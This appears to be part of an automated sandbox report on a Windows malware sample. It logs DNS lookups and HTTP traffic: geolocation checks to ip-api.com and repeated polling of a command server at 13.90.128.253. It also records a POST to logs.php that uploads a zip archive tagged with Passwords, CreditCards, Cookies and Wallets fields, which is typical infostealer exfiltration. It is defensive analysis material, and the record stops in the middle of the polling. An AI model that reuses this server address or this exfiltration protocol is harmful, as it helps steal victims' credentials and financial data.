                                                                                                              Nov 24, 2022 10:05:14.112740993 CET53609988.8.8.8192.168.2.5
                                                                                                              Nov 24, 2022 10:05:23.455259085 CET5695353192.168.2.58.8.8.8
                                                                                                              Nov 24, 2022 10:05:23.477333069 CET53569538.8.8.8192.168.2.5
                                                                                                              Nov 24, 2022 10:05:29.131742954 CET5928753192.168.2.58.8.8.8
                                                                                                              Nov 24, 2022 10:05:29.151164055 CET53592878.8.8.8192.168.2.5
                                                                                                              Nov 24, 2022 10:05:30.232311010 CET5864853192.168.2.58.8.8.8
                                                                                                              Nov 24, 2022 10:05:30.249808073 CET53586488.8.8.8192.168.2.5
                                                                                                              Nov 24, 2022 10:05:30.631279945 CET5689453192.168.2.58.8.8.8
                                                                                                              Nov 24, 2022 10:05:30.658508062 CET53568948.8.8.8192.168.2.5
                                                                                                              Nov 24, 2022 10:05:39.309519053 CET5029553192.168.2.58.8.8.8
                                                                                                              Nov 24, 2022 10:05:39.327297926 CET53502958.8.8.8192.168.2.5
                                                                                                              Nov 24, 2022 10:05:42.011234999 CET6084153192.168.2.58.8.8.8
                                                                                                              Nov 24, 2022 10:05:42.030308008 CET53608418.8.8.8192.168.2.5
                                                                                                              Nov 24, 2022 10:05:52.942070007 CET6064953192.168.2.58.8.8.8
                                                                                                              Nov 24, 2022 10:05:52.959813118 CET53606498.8.8.8192.168.2.5

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Nov 24, 2022 10:05:03.955020905 CET192.168.2.58.8.8.80x4d76Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:11.936229944 CET192.168.2.58.8.8.80x242Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:14.093523026 CET192.168.2.58.8.8.80x3ce2Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:23.455259085 CET192.168.2.58.8.8.80x78e8Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:29.131742954 CET192.168.2.58.8.8.80xd2b6Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:30.232311010 CET192.168.2.58.8.8.80xf5ccStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:30.631279945 CET192.168.2.58.8.8.80x281aStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:39.309519053 CET192.168.2.58.8.8.80x8a3Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:42.011234999 CET192.168.2.58.8.8.80xe706Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:52.942070007 CET192.168.2.58.8.8.80x40d0Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Nov 24, 2022 10:05:03.972485065 CET8.8.8.8192.168.2.50x4d76No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:11.957767010 CET8.8.8.8192.168.2.50x242No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:14.112740993 CET8.8.8.8192.168.2.50x3ce2No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:23.477333069 CET8.8.8.8192.168.2.50x78e8No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:29.151164055 CET8.8.8.8192.168.2.50xd2b6No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:30.249808073 CET8.8.8.8192.168.2.50xf5ccNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:30.658508062 CET8.8.8.8192.168.2.50x281aNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:39.327297926 CET8.8.8.8192.168.2.50x8a3No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:42.030308008 CET8.8.8.8192.168.2.50xe706No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                              Nov 24, 2022 10:05:52.959813118 CET8.8.8.8192.168.2.50x40d0No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • ip-api.com
                                                                                                              • 13.90.128.253

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.2.549688208.95.112.180C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2022 10:05:04.028804064 CET0OUTGET /json/ HTTP/1.1
                                                                                                              Host: ip-api.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 24, 2022 10:05:04.061831951 CET0INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:03 GMT
                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                              Content-Length: 293
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              X-Ttl: 60
                                                                                                              X-Rl: 44
                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 22 7d
                                                                                                              Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.49"}


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              1192.168.2.549689208.95.112.180C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2022 10:05:11.995855093 CET1OUTGET /json/ HTTP/1.1
                                                                                                              Host: ip-api.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 24, 2022 10:05:12.028294086 CET2INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:11 GMT
                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                              Content-Length: 293
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              X-Ttl: 52
                                                                                                              X-Rl: 43
                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 22 7d
                                                                                                              Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.49"}


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              10192.168.2.54969813.90.128.25380C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2022 10:05:39.916527033 CET12OUTGET /wp-content/lock/gate.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:40.072050095 CET12INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:39 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              11192.168.2.549699208.95.112.180C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2022 10:05:42.070610046 CET13OUTGET /json/ HTTP/1.1
                                                                                                              Host: ip-api.com
                                                                                                              Nov 24, 2022 10:05:42.108103037 CET14INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:41 GMT
                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                              Content-Length: 293
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              X-Ttl: 21
                                                                                                              X-Rl: 41
                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 22 7d
                                                                                                              Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.49"}


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              12192.168.2.54970013.90.128.25380C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2022 10:05:43.179892063 CET14OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.356317997 CET14INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:43 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:43.367906094 CET15OUTPOST /wp-content/lock/logs.php?hwid=CH84D70FD1B3&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary=---------------------8dace08a809cd1a
                                                                                                              Host: 13.90.128.253
                                                                                                              Content-Length: 794515
                                                                                                              Expect: 100-continue
                                                                                                              Nov 24, 2022 10:05:43.471673012 CET15INHTTP/1.1 100 Continue
                                                                                                              Nov 24, 2022 10:05:43.475372076 CET15OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 63 65 30 38 61 38 30 39 63 64 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65
                                                                                                              Data Ascii: -----------------------8dace08a809cd1aContent-Disposition: form-data; name="file"; filename="CH_84D70FD1B3.zip"Content-Type: application/octet-stream
                                                                                                              Nov 24, 2022 10:05:43.475536108 CET23OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 a8 50 78 55 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 43 61 72 64 73 2e 74 78 74 50 4b 03 04 14 00 00 00 00 00 f1 51 78 55 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 46 69 6c 65 73 5c 50 4b 03 04 14 00 00
                                                                                                              Data Ascii: PKPxUCards.txtPKQxUFiles\PKPxUMhLinfo.txt1O0wK7&ihSQRb@VX8vl_.Ua|:-xU"wWm7x\IA/\lC,f1n%)biO;d
                                                                                                              Nov 24, 2022 10:05:43.475636959 CET27OUTData Raw: 28 27 1e 50 19 a2 f9 e4 03 21 be 2f a4 70 fb 8c 90 44 df 9d 12 d9 0a 11 8f 69 fd 4f 22 1a 4a 46 4d 5f 5f 1f d8 98 01 ef 07 f6 7f b0 0e c0 ca c2 6f 2b 56 0b 5e d1 7b ef cb de a5 09 ab 45 57 ec f3 c5 08 75 09 e6 68 01 fb 7b c2 9d 69 ca 16 53 1c 57
                                                                                                              Data Ascii: ('P!/pDiO"JFM__o+V^{EWuh{iSWRwt8rr|a`V,7,2`R2pe1CVy!WX5<c~;@qR/5^y^BT :w9)GUC%ip+gK
                                                                                                              Nov 24, 2022 10:05:43.577341080 CET43OUTData Raw: 39 d0 28 0a 72 69 67 d7 4e 1a 08 ad a4 e2 89 eb 64 7a f1 f7 ed 33 fe fb 6d e6 d5 08 d4 1a 6c 62 45 88 d2 6a e3 f5 e3 f4 2b 9c 7f 47 6a e8 90 d8 e6 77 be f1 cf 88 2c 13 60 7c 7c 69 1f c4 f9 31 c6 10 6a cf 8b 6f 9b 15 3a c6 b7 d3 ae bc d7 b8 82 00
                                                                                                              Data Ascii: 9(rigNdz3mlbEj+Gjw,`||i1jo:kZZOj;HB"}*d6)tPalNj(IpwUZ,{bQ%Zn}3OS|' 3k<KTm:u`mJCABC)P2
                                                                                                              Nov 24, 2022 10:05:43.577456951 CET51OUTData Raw: 96 70 99 d3 ee ae bd 91 56 0a a0 51 5b bc d1 5a 22 eb fc 55 bd c6 d4 b8 4f 58 d3 c8 03 e8 e2 97 e4 29 11 ea 0a 0b f6 df 35 89 0c a0 79 be 5b 72 6a 3c 76 2e cd 7e a9 94 ae 82 af f3 ef 3d 7b c2 c7 97 44 f9 95 f8 dc f1 b4 d1 31 10 b0 9c 7f 87 c2 b9
                                                                                                              Data Ascii: pVQ[Z"UOX)5y[rj<v.~={D1a.[Xp5BcUw}tJ&8G`'WR?!<"L~;7iZx,90[~FDD9hS9/Mg;BRH67t!$sf^eG*OCK
                                                                                                              Nov 24, 2022 10:05:43.679079056 CET66OUTData Raw: 49 a3 4e 81 cd e7 7c a1 19 76 62 f1 e5 32 28 2f e8 d1 5e 1e 66 42 ec a4 c8 64 2c bd 1e af b1 3f 2e 34 d2 05 7a f1 46 9e f7 81 35 da 27 1c 2e 4e 4b 48 b5 94 4c 50 34 4c ad 5b 1a 87 58 c6 f9 60 89 1c bb ec 0e fa 6d 4d 6c 0f 72 01 8c 38 2d 79 11 85
                                                                                                              Data Ascii: IN|vb2(/^fBd,?.4zF5'.NKHLP4L[X`mMlr8-y-+J8:)lLwpyM\8SAw}x4>,;GzK6IN,KU1Lo4_Q)ySUaPI_(}>_0PCZI/#
                                                                                                              Nov 24, 2022 10:05:43.679181099 CET79OUTData Raw: da 2a d0 e6 7c 17 ea b8 4a 17 7d 4d 4d ad b4 78 a1 87 ef da 3f 32 5c f5 10 44 3d 76 d4 79 56 ee 1c da a3 fc 41 13 a4 09 57 7f 24 ea 5c bc 27 3c 3d db 96 de 27 1a 86 79 bb be 00 03 69 4a 05 10 76 db 1a 76 ef 59 75 2a 10 85 d3 3a b9 16 34 97 10 d9
                                                                                                              Data Ascii: *|J}MMx?2\D=vyVAW$\'<='yiJvvYu*:4GdrhgoF#M?a,nH?l3_,uv2^zEFvb*-{rLn^AEX[u0o@(t_(c_yf%HFhw
                                                                                                              Nov 24, 2022 10:05:43.679234028 CET84OUTData Raw: 1f c7 0c ef 2e 12 79 cc ef 2e fe 6a b9 38 af b0 37 46 36 4d 09 55 78 ce ef 66 4c b5 5c b8 0e 7f 33 41 fe dd 48 9c c2 ae b0 e2 f1 3c b7 ce d0 35 3a d9 d9 48 ee fa c6 63 c5 f3 d0 f8 fa eb 06 d3 f2 8a ee 4d c3 dd 00 9e e4 5a ba bf c0 8e 06 d1 75 03
                                                                                                              Data Ascii: .y.j87F6MUxfL\3AH<5:HcMZu`\10oRiCO~ya(kgFyxa~*U*!$KmqfLc1O3Cf|[(x\mkP%R&T`YT|g+YK&:EUW_A
                                                                                                              Nov 24, 2022 10:05:43.679234028 CET92OUTData Raw: 55 b1 fd 8d 10 c2 0f f0 2c c1 fa e8 86 96 be b8 9c ca ec 77 d9 ea f6 bb ab 76 08 65 8e a5 c3 2f 03 52 64 32 4f 7d 6d 1f ab ee 10 c5 24 df 26 82 b5 38 14 ef 1f 91 c3 2b 76 6b cd f7 dd a4 8b ad 9d ea 26 54 bb 85 72 91 01 02 33 7f 67 f6 af d9 b2 13
                                                                                                              Data Ascii: U,wve/Rd2O}m$&8+vk&Tr3gv):BvlZF$=Nk&dR>?r|CpBZ%;=!E$gZc}wFI#}%uaju|o-a96$>x^H<w
                                                                                                              Nov 24, 2022 10:05:43.679275036 CET96OUTData Raw: 4f 06 a6 fa 64 21 05 2b 62 cd e4 87 e5 96 26 31 05 11 aa b4 4e 39 89 68 96 4c cf 96 c0 0c e0 f7 81 72 72 88 89 39 70 66 15 a9 c0 b7 44 63 22 d7 b9 4a d8 ab fa 15 e8 d9 c2 25 0d 86 a6 28 b2 03 15 9f 1e 63 a4 bd 85 e3 76 7e 86 ee 86 ab b4 49 1a 4a
                                                                                                              Data Ascii: Od!+b&1N9hLrr9pfDc"J%(cv~IJ>~;aplbzA3qH,~%bzT=k9(}gu^0XJd.a]6ZGG^e(2-48}/OigR{5X|FWhzOCj
                                                                                                              Nov 24, 2022 10:05:44.249612093 CET806INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:43 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              13192.168.2.54970113.90.128.25380C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2022 10:05:49.419418097 CET808OUTGET /wp-content/lock/gate.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:49.575807095 CET817INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:49 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              14192.168.2.54970313.90.128.25380C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2022 10:05:52.879879951 CET819OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 24, 2022 10:05:53.039249897 CET820INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:52 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:53.346751928 CET821OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:53.542736053 CET821INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:53 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:53.660933018 CET821OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:53.771998882 CET822INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:53 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:54.253127098 CET822OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:54.401341915 CET822INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:54 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:54.529164076 CET822OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:54.635700941 CET823INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:54 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:54.940526962 CET823OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:55.048121929 CET823INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:54 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:55.213009119 CET823OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:55.354645014 CET824INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:55 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:55.466600895 CET824OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:55.573147058 CET824INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:55 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:55.685446024 CET824OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:55.798619032 CET825INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:55 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:55.904236078 CET825OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
